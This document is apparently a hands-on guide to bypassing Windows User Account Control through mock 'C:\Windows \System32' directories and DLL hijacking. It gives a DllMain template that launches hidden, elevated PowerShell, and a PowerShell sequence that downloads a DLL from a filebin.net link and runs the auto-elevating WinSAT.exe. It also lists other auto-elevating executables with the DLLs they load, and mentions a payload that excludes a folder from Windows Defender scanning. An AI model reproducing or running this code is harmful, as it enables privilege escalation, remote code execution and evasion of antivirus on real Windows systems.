Originally discovered by Daniel Gebert
Table of Contents
First edit the file to download your malicous DLL from Filebin
To easiliy create said DLL - I would modify This template with the code below
dllmain.c
#include "pch.h"
#include "prxdll.h"
#include "windows.h"
BOOL APIENTRY DllMain(
const HINSTANCE instance,
const DWORD reason,
const PVOID reserved)
{
switch (reason) {
case DLL_PROCESS_ATTACH:
WinExec("powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command \"Start-Process -verb runas powershell\" \"'-NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command YOURPOWERSHELLCOMMANDHERE\" '\"", 1);
DisableThreadLibraryCalls(instance);
return prx_attach(instance);
case DLL_PROCESS_DETACH:
prx_detach(reserved);
break;
}
return TRUE;
}
This should execute some powershell code as admin.
Next we need to find some autoelavate applications. I prefer to use winSAT.exe as there is no visual GUI when ran. Heres some other Auto elavate applications.
Okay so the you need to edit the powershell source code
New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
Invoke-WebRequest -Uri 'https://filebin.net/bajzrgruy6h83o4n/version.dll' -OutFile 'version.dll'
Start-Process -Filepath 'C:\windows \System32\winSAT.exe'
Start-Sleep -s 1
Remove-Item '\\?\C:\Windows \' -Force -Recurse
First modification:
Build your DLL using visual studio code and upload it to filebin. My DLL adds a windows defender preference to not scan the TEMP directory
Replace the Invoke-WebRequest Uri with your link and replace the copy argument with the location of your windows application.
Now for the final step - Replace every new line with a semicolon and convert it into a batch script
powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Yourcodehere"
And boom! You can execute that system command bypass UAC!
Remember - you can program this into most high level languages - as all you need to do is execute a system command!
Microsoft introduced UAC (User Account Control) with Windows Vista and Windows Server 2008.
In short terms - UAC aims to improve the security of Microsoft Windows by giving programs standard user privileges until an administrator authorizes an increase or elevation of permissions. Wikipedia
DLL Hijacking means a program will load and execute a malicious DLL contained in the same folder as a data file opened by these programs. Wikipedia
Heres a description I stole from daniels blog
Mock directories are folders with a trailing space. For example \
C:\Windows \System32
See the space " " between "Windows" and "\System32".\
Executable |
DLL |
Comment |
ComputerDefaults.exe |
profapi.dll |
Can also bypass UAC using other methods. |
EASPolicyManagerBrokerHost.exe |
profapi.dll |
|
fodhelper.exe |
profapi.dll |
Opens settings and can be used to bypass UAC using other methods |
FXSUNATD.exe |
version.dll |
|
msconfig.exe |
version.dll |
Can also bypass UAC using other methods |
OptionalFeatures.exe |
profapi.dll |
Opens Windows Optional Features |
sdclt.exe |
profapi.dll |
Can also bypass UAC using other methods; opens Windows Backup |
ServerManager.exe |
profapi.dll |
ServerManager.exe is not present by default |
systemreset.exe |
version.dll |
|
sysprep.exe |
version.dll |
Creates sub folder. Sysprep process has to be killed directly after UAC bypass, otherwise sysprep is executed! |
SystemSettingsAdminFlows.exe |
version.dll |
|
WinSAT.exe |
version.dll |
|
WSReset.exe |
profapi.dll |
Opens Windows Store |